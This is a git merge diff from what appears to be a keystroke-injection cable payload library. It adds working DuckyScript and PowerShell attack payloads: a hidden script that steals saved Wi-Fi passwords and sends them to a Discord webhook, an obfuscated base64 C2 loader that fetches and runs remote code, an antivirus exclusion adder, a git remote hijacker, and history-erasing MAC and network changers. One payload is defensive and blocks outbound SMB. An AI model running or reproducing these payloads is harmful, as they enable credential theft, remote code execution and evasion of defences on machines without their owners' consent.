Merge 06941a5e8c into 483c8e239f

The Bypass Buddy

.gitignore

@@ -0,0 +1 @@
+.DS_Store

README.md

@@ -14,7 +14,7 @@ To get a cable like this, you used to need a million dollar budget or to find a
 ![OMG Cable](https://cdn.shopify.com/s/files/1/0068/2142/files/omg_400x.png?v=1604676891)
 
 ## Documentation
-Documentation on developing payloads for the OMG Cable can be found on the [OMG Wiki](https://github.com/O-MG/O.MG_Cable-Firmware/wiki).
+Documentation on developing payloads for the OMG Cable can be found on the [OMG Wiki](https://github.com/O-MG/O.MG-Firmware/wiki).
 
 ## Disclaimer
 Generally, payloads may execute commands on your device or target. As such, it is possible for a payload to damage your device or target. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution.

payloads/library/credentials/Defend_yourself_from_CVE-2023-23397/README.md

@@ -0,0 +1,115 @@
+# Defend Yourself From CVE-2023-23397
+
+This script allows you to set the Firewall rule that will allow you to defend against CVE-2023-23397.
+
+**Category**: Credentials
+
+*I decided to set Credentials as the category because of the type of CVE.*
+
+## Index
+
+- [Defend Yourself From CVE-2023-23397](#defend-yourself-from-cve-2023-23397)
+  - [Payload Description](#payload-description)
+  - [CVE-2023-23397 Description](#cve-2023-23397-description)
+    - [Summary](#summary)
+    - [Impacted Products](#impacted-products)
+    - [Technical Details](#technical-details)
+  - [Note](#note)
+  - [Dependencies](#dependencies)
+  - [Settings](#settings)
+    - [Administrative Privileges](#administrative-privileges)
+    - [Set the rule](#set-the-rule)
+    - [See the new rule](#see-the-new-rule)
+    - [Remove the rule](#remove-the-rule)
+  - [Credits](#credits)
+
+## Payload Description
+
+This script allows you to set the Firewall rule that will allow you to defend against CVE-2023-23397.
+
+Open a PowerShell, set the Firewall rule trough NetSecurity module.
+
+
+![](docs/2.png)
+
+## CVE-2023-23397 Description
+
+### Summary 
+
+Microsoft Threat Intelligence discovered limited, targeted abuse of a vulnerability in Microsoft Outlook for Windows that allows for new technology LAN manager (NTLM) credential theft to an untrusted network, such as the Internet. Microsoft has released CVE-2023-23397 to address the critical elevation of privilege (EoP) vulnerability affecting Microsoft Outlook for Windows. We strongly recommend all customers update Microsoft Outlook for Windows to remain secure.
+
+### Impacted Products
+
+All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
+
+### Technical Details
+
+CVE-2023-23397 is a critical EoP vulnerability in Microsoft Outlook that is triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server on an untrusted network. No user interaction is required.
+
+The threat actor is using a connection to the remote SMB server sends the user’s NTLM negotiation message, which the attacker can then relay for authentication against other systems that support NTLM authentication.
+
+**Source**: https://msrc.microsoft.com/blog/2023/03/microsoft-mitigates-outlook-elevation-of-privilege-vulnerability/
+
+## Note
+
+Tested on:
+- Windows 11 Eng
+
+## Dependencies
+
+* ExecutionPolicy Bypass
+
+## Settings
+
+In this payload, I created a new firewall rule called "CVE-2023-23397". The direction is set to "Outbound," the action is "Block" (block traffic), the protocol is "TCP," and the remote port is 445 (SMB). Next, the rule is enabled using the Enable-NetFirewallRule cmdlet by specifying the name of the previously created rule.
+
+Remember that you must run PowerShell with administrative privileges to create and manage firewall rules.
+
+### Administrative Privileges
+
+- I used the Payload [Starting a PowerShell with administrator permissions in Windows 10/11](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/execution/Starting_a_PowerShell_with_administrator_permissions_in_Windows) by Hak5 Payloads
+
+```
+DELAY 1000
+GUI x
+DELAY 500
+STRING a
+DELAY 500
+LEFT_ARROW
+DELAY 500
+ENTER
+```
+
+### Set the rule
+
+![](docs/1.png)
+
+### See the new rule
+
+![](docs/2.png)
+
+### Remove the rule
+
+![](docs/3.png)
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/credentials/Defend_yourself_from_CVE-2023-23397/payload.txt

@@ -0,0 +1,49 @@
+REM ########################################################
+REM #                                                      |
+REM # Title        : Defend Yourself From CVE-2023-23397   |
+REM # Author       : Aleff                                 |
+REM # Version      : 1.0                                   |
+REM # Category     : Credentials                           |
+REM # Target       : Windows 10/11                         |
+REM #                                                      |
+REM ########################################################
+
+REM PlugAndPlay <3
+
+REM Requirements:
+REM     - ExecutionPolicy Bypass
+
+REM Impacted Products:
+REM     - All supported versions of Microsoft Outlook for Windows are affected. Other versions of Microsoft Outlook such as Android, iOS, Mac, as well as Outlook on the web and other M365 services are not affected.
+
+REM Mitigation:
+REM     - Block TCP 445/SMB outbound from your network by using a perimeter firewall, a local firewall, and via your VPN settings. This will prevent the sending of NTLM authentication messages to remote file shares.
+REM       Source: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-23397
+
+DELAY 1000
+GUI x
+DELAY 500
+STRING a
+DELAY 500
+LEFTARROW
+DELAY 500
+ENTER
+
+REM Import NetSecurity module
+STRINGLN Import-Module NetSecurity
+
+REM Create a new firewall rule for blocking outgoing connections on port 445
+STRINGLN_BLOCK
+    $rule = New-NetFirewallRule -DisplayName "CVE-2023-23397" `
+        -Direction Outbound `
+        -Action Block `
+        -Protocol TCP `
+        -RemotePort 445
+END_STRINGLN
+
+REM Enable firewall rule
+STRINGLN Enable-NetFirewallRule -Name $rule.Name
+DELAY 500
+
+REM See your new rule
+STRINGLN Get-NetFirewallRule | Where-Object { $_.DisplayName -eq "CVE-2023-23397" }

payloads/library/credentials/SamDumpCable/README.md

@@ -1,6 +1,6 @@
 **Title: SamDumpCable**
 
-<p>Author: 0iphor13<br>
+<p>Author: 0i41E<br>
 OS: Windows<br>
 Version: 1.0<br>
 Requirements: OMG Firmware v.2.5 or higher</p>
@@ -23,4 +23,4 @@ Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
 	
 	**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
 
-![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)
+![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)

payloads/library/credentials/SamDumpCable/payload.txt

@@ -1,6 +1,6 @@
 REM Title:         SamDumpCable
 REM Description:   Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
-REM Author:        0iphor13
+REM Author:        0i41E
 REM Version:       1.0
 REM Category:      Credentials
 REM Requirements: OMG Firmware v.2.5 or higher

payloads/library/credentials/WLAN-Windows-Passwords/README.md

@@ -0,0 +1,48 @@
+# WLAN Windows Password
+
+A script used to stole target WLAN Passwords.
+
+**Category**: Credentials
+
+## Description
+
+A script used to stole target WLAN Passwords.
+
+Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+
+Then it cleans up traces of what you have done after.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+### Executing program
+
+* Plug in your device
+* Invoke 2 netsh commands
+* Invoke-WebRequest will be entered in the Run Box to send the content
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1

@@ -0,0 +1,16 @@
+
+# ENG
+netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {
+    $wlan  = $_.Matches.Value
+    $passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
+
+	$Body = @{
+		'username' = $env:username + " | " + [string]$wlan
+		'content' = [string]$passw
+	}
+	
+	Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)
+}
+
+# Clear the PowerShell command history
+Clear-History

payloads/library/credentials/WLAN-Windows-Passwords/payload.txt

@@ -0,0 +1,25 @@
+REM ###################################################################
+REM #                                                                 |
+REM # Title        : WLAN-Windows-Passwords-Discord-Exfiltration      |
+REM # Author       : Aleff                                            |
+REM # Description: A script used to stole target WLAN Passwords.      |
+REM # Category     : Credentials                                      |
+REM # Target       : Windows 10-11                                    |
+REM # Version      : 1.0                                              |
+REM #                                                                 |
+REM ###################################################################
+
+
+
+DELAY 2000
+GUI r
+DELAY 250
+STRING powershell -w h -ep bypass $discord='
+
+REM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks/<webhook_id>/<token>
+DEFINE DISCORD example.com
+STRING DISCORD
+
+REM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1
+DEFINE PAYLOAD example.com
+STRINGLN ';irm PAYLOAD | iex

payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/README.md

@@ -0,0 +1,46 @@
+# Add An Excepiton To Avast Antivirus
+
+This script can be used to put an arbitrary exception path in the Avast app.
+
+**Category**: Execution
+
+## Description
+
+This script can be used to put an arbitrary exception path in the Avast app.
+
+The script open the Avast app, then go to menu, then go to, avast settings, then go to exception menu, then click the add exception button, then write the full-path defined before and save it, then close the app.
+
+Choosing a specific file, folder, or website will exclude it from all Avast shields and scans, so be very careful when using this payload because it can concretely cause damage to your machine.
+
+- You must edit the FULL-PATH with the path that you want to set as exception in the payload.txt file
+
+```DuckyScript
+REM Set the full-path that you want to set as exception
+DEFINE FULL-PATH example/to/path
+```
+
+### Dependencies
+
+* The target must have **Avast installed** and **configured** on the machine
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt

@@ -0,0 +1,50 @@
+REM ########################################################
+REM #                                                      |
+REM # Title        : Add An Exception To Avast Antivirus   |
+REM # Author       : Aleff                                 |
+REM # Version      : 1.0                                   |
+REM # Category     : Execution                               |
+REM # Target       : Windows 10/11                         |
+REM #                                                      |
+REM ########################################################
+
+
+REM Requirements:
+REM     - Avast installed and configured
+
+
+REM Set the full-path that you want to set as exception
+DEFINE FULL-PATH example/to/path
+
+DEFAULT_DELAY 500
+REM Open Avast application
+DELAY 2000
+GUI
+STRINGLN avast
+
+REM Go to Avast menu
+DELAY 1000
+REPEAT 3 TAB
+ENTER
+
+REM Go to Avast settings
+DELAY 1000
+REPEAT 4 TAB
+ENTER
+
+REM Go to Exceptions menu
+DELAY 1000
+REPEAT 12 TAB
+ENTER
+
+REM Add Exception button
+TAB
+ENTER
+
+REM Write the full-path and then close the Avast app
+DELAY 1000
+TAB
+STRING FULL-PATH
+TAB
+ENTER
+ALT F4

payloads/library/execution/Ai-Cable

@@ -1,7 +1,7 @@
 REM       Ai-Cable
 REM       Version 2.0
 REM       OS: MULTI (Tested with the OMG-Plug on Google Chrome/Windows 10 at screen resolution 1920 x 1080)
-REM       Author: 0iphor13
+REM       Author: 0i41E
 
 REM       This payload will write its own payload, until you kill it! Maybe, if you wait long enough, it will create a payload of the month...
 REM       Click run and let it happen, don't move! Might not work properly on every system due to timings, screen resolution, etc...

payloads/library/execution/C2-Payload-Loader/Bootstrap-pLoader.txt

@@ -0,0 +1,35 @@
+REM Title: BOOTSTRAP - C2 Payload Loader (pLoader) w Discord Reporting
+REM Description: Bootstrap Payload for Remote (C2) Payload Loader with Discord Reporting.
+REM    This allows the payload to be executed on OMG Basic and other Smaller Devices. All 
+REM    inputs below are needed to start the script, unless know how to edit the Source. OMG
+REM    and InfoSecREDD (REDD) are not responsible for the misuse of this Payload. This is 
+REM    for Educational Purposes only.
+REM    IT IS ADVISED TO EDIT THE MAIN URL TO POINT TO A CUSTOM VERSION W YOUR VARIABLES
+REM AUTHOR: InfoSecREDD
+REM Version: 0.2
+REM Category: Execution (REMOTE)
+REM Compatibility: Flipper Zero AND DuckyScript Devices
+REM Target: Windows
+
+REM To use on Flipper Zero REM the DUCKY_LANG US from line below
+DUCKY_LANG US
+DELAY 2000
+GUI r
+DELAY 500
+STRING powershell
+ENTER
+DELAY 2000
+REM Put your Discord webhook below.
+STRING $webhook = "DiscordWebhookHere"; 
+REM C2 file must be hosted at GitHub unless you can edit the file. 1 = ON and 0 = OFF 
+STRING $ccontrol = "C2FileHere";
+REM Put your Remote List of Payloads below.
+STRING $URLS = "URLFileListHere"; 
+REM Put your Timer file below. 10-18000 Its counted in Minutes.
+STRING $timer = "TimerFileHere"; 
+REM OVERDRIVE - Overdrive allows the payloads to execute without prior payload finishing. 1 = ON and 0 = OFF
+STRING $overdrive = "OverdriveFileHere"; 
+REM Lets run this thing.
+STRING $TempFile = "$env:TEMP\temp.ps1"; $File = "$env:TEMP\l.ps1"; echo JFVSTCA9ICJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vaGFrNS9vbWctcGF5bG9hZHMvbWFzdGVyL3BheWxvYWRzL2xpYnJhcnkvZXhlY3V0aW9uL0MyLVBheWxvYWQtTG9hZGVyL0MyLXBMb2FkZXIudHh0Ig0KJGkgPSAnW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXSBwdWJsaWMgc3RhdGljIGV4dGVybiBib29sIFNob3dXaW5kb3coaW50IGhhbmRsZSwgaW50IHN0YXRlKTsnOw0KYWRkLXR5cGUgLW5hbWUgd2luIC1tZW1iZXIgJGkgLW5hbWVzcGFjZSBuYXRpdmU7DQpbbmF0aXZlLndpbl06OlNob3dXaW5kb3coKFtTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc106OkdldEN1cnJlbnRQcm9jZXNzKCkgfCBHZXQtUHJvY2VzcykuTWFpbldpbmRvd0hhbmRsZSwgMCk7DQokUkFOID0gLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgOCB8ICUge1tjaGFyXSRffSkNCiRSQU5mID0gLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMSB8ICUge1tjaGFyXSRffSkNCiRkaXJfbmFtZSA9ICIkUkFOIg0KJHBhdGggPSAiJGVudjp0ZW1wXCRkaXJfbmFtZSINCiR0ZW1wRmlsZW5hbWUgPSAidC50eHQiDQokdGVtcEZpbGUgPSAiJHBhdGhcJHRlbXBGaWxlbmFtZSINCmlmICghKFRlc3QtUGF0aCAiJHBhdGgiKSkNCnsNCiAgTmV3LUl0ZW0gIiRwYXRoIiAtSXRlbVR5cGUgRGlyZWN0b3J5ICA+JG51bGwgMj4mMQ0KfQ0KaWYgKCEoVGVzdC1QYXRoICIkdGVtcEZpbGUiKSkNCnsNCiAgTmV3LUl0ZW0gLVBhdGggIiRwYXRoIiAtTmFtZSAiJHRlbXBGaWxlbmFtZSIgLUl0ZW1UeXBlIEZpbGUgID4kbnVsbCAyPiYxDQp9DQokZW5jRG93biA9ICgoSW52b2tlLXdlYnJlcXVlc3QgLVVSSSAiJFVSTCIgLVVzZUJhc2ljUGFyc2luZykuQ29udGVudCB8IE91dC1TdHJpbmcpLlRyaW0oKSB8IEZvckVhY2gtT2JqZWN0IHsgW0NvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCRfKSkgfQ0KJGV4ZURvd24gPSAiJGVuY0Rvd24iIHwgRm9yRWFjaC1PYmplY3QgeyBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJF8pKSB9IA0KIiRleGVEb3duIiB8IE91dC1GaWxlIC1GaWxlUGF0aCAiJHRlbXBGaWxlIiAtQXBwZW5kDQokYmFzZTY0U3RyID0gJ2VjaG8gW0EtWmEtejAtOS8rXC1fXXsxMjUsfScNCiRkb3duQ29udCA9IEdldC1Db250ZW50IC1QYXRoICIke3RlbXBGaWxlfSIgLVJhdw0KJG1hdGNoID0gW3JlZ2V4XTo6TWF0Y2goIiRkb3duQ29udCIsICIkYmFzZTY0U3RyIikNCmlmICgkbWF0Y2guU3VjY2Vzcykgew0KICAkUkFOID0gLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgOCB8ICUge1tjaGFyXSRffSkNCiAgJFJBTmYgPSAtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCAxIHwgJSB7W2NoYXJdJF99KQ0KICAkZGlyX25hbWUgPSAiJFJBTiINCiAgJHBhdGggPSAiJGVudjp0ZW1wXCRkaXJfbmFtZSINCiAgJHRlbXBGaWxlbmFtZSA9ICJ0LnBzMSINCiAgJHRlbXBGaWxlID0gIiRwYXRoXCR0ZW1wRmlsZW5hbWUiDQogICRiYXNlNjRTdHJDb250ZW50ID0gJ1tBLVphLXowLTkrLz1dezEyNSx9Jw0KICAkbWF0Y2hDb250ZW50ID0gW3JlZ2V4XTo6TWF0Y2goIiRkb3duQ29udCIsICIkYmFzZTY0U3RyQ29udGVudCIpDQogIGlmICgkbWF0Y2hDb250ZW50LlN1Y2Nlc3MpIHsNCiAgICAkZXh0cmFjdGVkU3RyaW5nID0gJG1hdGNoQ29udGVudC5WYWx1ZQ0KICAgIGlmICghKFRlc3QtUGF0aCAiJHBhdGgiKSkNCiAgICB7DQogICAgICBOZXctSXRlbSAiJHBhdGgiIC1JdGVtVHlwZSBEaXJlY3RvcnkgID4kbnVsbCAyPiYxDQogICAgfQ0KICAgIGlmIChUZXN0LVBhdGggIiR0ZW1wRmlsZSIpDQogICAgew0KICAgICAgUmVtb3ZlLUl0ZW0gLVBhdGggIiR0ZW1wRmlsZSIgLUZvcmNlIC1SZWN1cnNlDQogICAgICBOZXctSXRlbSAtUGF0aCAiJHBhdGgiIC1OYW1lICIkdGVtcEZpbGVuYW1lIiAtSXRlbVR5cGUgRmlsZSAgPiRudWxsIDI+JjENCiAgICB9DQogICAgaWYgKCEoVGVzdC1QYXRoICIkdGVtcEZpbGUiKSkNCiAgICB7DQogICAgICBOZXctSXRlbSAtUGF0aCAiJHBhdGgiIC1OYW1lICIkdGVtcEZpbGVuYW1lIiAtSXRlbVR5cGUgRmlsZSAgPiRudWxsIDI+JjENCiAgICB9DQogICAgJGZvcm1hdHBMb2FkZXIgPSAtam9pbiAkZXh0cmFjdGVkU3RyaW5nDQogICAgJHBMb2FkZXJSYXcgPSAiJGZvcm1hdHBMb2FkZXIiIHwgRm9yRWFjaC1PYmplY3QgeyBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJF8pKSB9IA0KICAgICRmaXhwTG9hZGVyID0gJHBMb2FkZXJSYXcuU3Vic3RyaW5nKDEpDQogICAgImAkd2ViaG9vayA9IGAiJHdlYmhvb2tgImA7IGAkY2NvbnRyb2wgPSBgIiRjY29udHJvbGAiYDsgYCRVUkxTID0gYCIkVVJMU2AiYDsgYCR0aW1lciA9IGAiJHRpbWVyYCI7IGAkb3ZlcmRyaXZlID0gYCIkb3ZlcmRyaXZlYCJgOyIgfCBPdXQtRmlsZSAtRmlsZVBhdGggIiRwYXRoXCR0ZW1wRmlsZW5hbWUiIC1BcHBlbmQNCiAgICAiJGZpeHBMb2FkZXIiIHwgT3V0LUZpbGUgLUZpbGVQYXRoICIkcGF0aFwkdGVtcEZpbGVuYW1lIiAtQXBwZW5kDQogIH0NCg0KU3RhcnQtUHJvY2VzcyBwb3dlcnNoZWxsIC1Bcmd1bWVudExpc3QgIi1Ob1Byb2ZpbGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgYCImICckdGVtcEZpbGUnYCIiIC1QYXNzVGhydSAtV2luZG93U3R5bGUgTWluaW1pemVkID4kbnVsbCAyPiYxDQpzbGVlcCA1DQp9DQppZiAoVGVzdC1QYXRoICIkcGF0aCIpIHsNClJlbW92ZS1JdGVtIC1QYXRoICIkdGVtcEZpbGUiIC1Gb3JjZSAtUmVjdXJzZQ0KUmVtb3ZlLUl0ZW0gLVBhdGggIiRwYXRoIiAtRm9yY2UgLVJlY3Vyc2UNCn0NCmV4aXQgMA== > "$TempFile"; certutil -f -decode "$TempFile" "$File" | out-null; & "$env:TEMP\l.ps1"
+DELAY 1000
+ENTER

payloads/library/execution/CAPSLOCK_DISABLE/README.md

@@ -0,0 +1,19 @@
+## About
+# Title: capslock_disable
+# Description: capslock_disable disables capslock on target's system.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux.
+# Attackmodes: HID.
+
+## capslock_disable: capslock_disable disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
+
+### Workflow:
+1. Executing Terminal Emulator.
+2. Prevent storing history.
+3. Executing command which disables capslock.
+4. Terminating terminal instance.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n 

payloads/library/execution/CAPSLOCK_DISABLE/payload.txt

@@ -0,0 +1,16 @@
+REM Title: capslock_disable
+REM Description: Disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
+REM AUTHOR: drapl0n
+REM Version: 1.0
+REM Category: Execution
+REM Target: GNU/Linux.
+REM Attackmodes: HID.
+
+DELAY 1000
+CTRL ALT t
+DELAY 500
+STRING unset HISTFILE
+ENTER
+DELAY 200
+STRING setxkbmap -option ctrl:nocaps && exit
+ENTER

payloads/library/execution/ChangeGitRemoteLink/README.md

@@ -0,0 +1,79 @@
+# Change Remote Git Link
+
+This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.
+
+**Category**: Execution
+
+## Description
+
+This script can be used to change the remote link from which updates will be downloaded and where new updates will be uploaded.
+
+This script turns out to be very useful for aviting data leaks between old cloned repositories and new online repositories.
+
+To make it easier to use below you can find the various tested configurations, at the moment it is not available for macOS because since I do not have one it cannot be tested and therefore I cannot give the certainty that it works, however I hope that in the Hak5 community there may be someone who can contribute to this payload by completing it with this missing part.
+
+## Payload.txt config - Windows 10/11 - Tested on Windows 11
+
+```DuckyScript
+    DELAY 1000
+    GUI r
+    DELAY 1000
+    STRING powershell
+    ENTER
+    DELAY 2000
+```
+
+## Payload.txt config - Linux (Debian based) - Tested on Ubuntu 23.04
+
+```DuckyScript
+    DELAY 1000
+    CTRL-ALT t
+    DELAY 2000
+```
+
+
+## Dependencies
+
+* Internet Connection
+* git installed
+* Full path of the cloned repository
+* ExecutionPolicy Bypass
+
+## Settings
+
+- Full path of the local repository i.e. "C:\Users\User\Documents\Repository1"
+```DuckyScript
+    DEFINE #FULL-PATH example
+```
+
+- Link from which updates are to be downloaded so the new repository the Repository2
+```DuckyScript
+    DEFINE #NEW-GIT-LINK example.git
+```
+
+- REM Define the branch of the new repository Repository2, i.e. "main"
+```DuckyScript
+    DEFINE #BRANCH example
+```
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/ChangeGitRemoteLink/payload.txt

@@ -0,0 +1,42 @@
+REM ###########################################
+REM #                                         |
+REM # Title        : Change Remote Git Link   |
+REM # Author       : Aleff                    |
+REM # Version      : 1.0                      |
+REM # Category     : Execution                |
+REM # Target       : Windows 10-11/Linux      |
+REM #                                         |
+REM ###########################################
+
+REM Requirements:
+REM     - Internet Connection
+REM     - git installed
+REM     - Full path of the cloned repository
+REM     - ExecutionPolicy Bypass if runned on Windows
+
+REM Full path of the local repository i.e. "C:\Users\User\Documents\Repository1"
+DEFINE #FULL-PATH example
+
+REM Link from which updates are to be downloaded so the new repository the Repository2
+DEFINE #NEW-GIT-LINK example.git
+
+REM Define the branch of the new repository Repository2, i.e. "main"
+DEFINE #BRANCH example
+
+DELAY 1000
+GUI r
+DELAY 1000
+STRING powershell
+ENTER
+DELAY 2000
+
+STRINGLN cd #FULL-PATH
+DELAY 1000
+STRINGLN git remote set-url origin #NEW-GIT-LINK
+DELAY 1000
+STRINGLN git pull --force origin #BRANCH
+DELAY 1000
+STRINGLN git reset --hard origin/#BRANCH
+DELAY 1000
+
+ALT F4

payloads/library/execution/ChangeMacAddress_Linux/README.md

@@ -0,0 +1,46 @@
+ 
+# Change MAC Address
+
+A script used to change the MAC address on a Linux machine.
+
+**Category**: Execution
+
+## Description
+
+A script used to change the MAC address on a Linux machine.
+
+Opens a shell, get the network card name, set the new MAC address, erase traces.
+
+## Getting Started
+
+### Dependencies
+
+* Linux Permissions
+* Internet Connection
+
+### Settings
+
+* Set the sudo password
+* Change as you want the new MAC address
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/ChangeMacAddress_Linux/payload.txt

@@ -0,0 +1,45 @@
+REM ###########################################
+REM #                                         |
+REM # Title        : Change Linux MAC Address |
+REM # Author       : Aleff                    |
+REM # Version      : 1.0                      |
+REM # Category     : Execution                |
+REM # Target       : Linux                    |
+REM #                                         |
+REM ###########################################
+
+REM Requirements:
+REM     - Permissions
+
+REM You need to know the sudo password and replace 'example' with this
+DEFINE SUDO_PASS example
+
+REM Set here your preferred MAC, you can don't change it remaining with the default value
+DEFINE NEW_MAC FF:FF:FF:FF:FF:FF
+
+DEFAULT_DELAY 500
+CTRL ALT t
+DELAY 2000
+
+REM #### PERMISSIONS SECTION ####
+STRINGLN sudo su
+DELAY 1000
+STRINGLN SUDO_PASS
+DELAY 1000
+
+REM #### MAC SECTION ####
+REM net-tools command
+STRINGLN apt install net-tools
+DELAY 2000
+
+REM Get the net interface name
+STRINGLN INTERFACE=$(ip route get 8.8.8.8 | awk '{print $5}')
+STRINGLN ifconfig $INTERFACE down
+STRINGLN ifconfig $INTERFACE hw ether NEW_MAC
+STRINGLN ifconfig $INTERFACE up
+
+REM #### REMOVE TRACES ####
+DELAY 2000
+STRINGLN history -c
+REM Close shell
+STRINGLN exit

payloads/library/execution/ChangeNetworkConfiguration_Linux/README.md

@@ -0,0 +1,45 @@
+ 
+# Change Network Configuration
+
+A script used to change the network configuration on a Linux machine.
+
+**Category**: Execution
+
+## Description
+
+A script used to change the network configuration on a Linux machine.
+
+Opens a shel, get the network card name, set the network configuration, erase traces.
+
+## Getting Started
+
+### Dependencies
+
+* Linux Permissions
+
+### Settings
+
+* Set the sudo password
+* Change as you want the network configuration
+
+## Credits
+
+<h2 align="center"> Aleff :octocat: </h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://github.com/aleff-github">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
+      </a>
+      <br>Github
+    </td>
+    <td align="center" width="96">
+      <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
+        <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
+      </a>
+      <br>Linkedin
+    </td>
+  </tr>
+</table>
+</div>

payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt

@@ -0,0 +1,59 @@
+REM ###############################################
+REM #                                             |
+REM # Title        : Change Network Configuration |
+REM # Author       : Aleff                        |
+REM # Version      : 1.0                          |
+REM # Category     : Execution                    |
+REM # Target       : Linux                        |
+REM #                                             |
+REM ###############################################
+
+REM Requirements:
+REM     - Permissions
+
+REM Required: You need to know the sudo password and replace 'example' with this
+DEFINE SUDO_PASS example
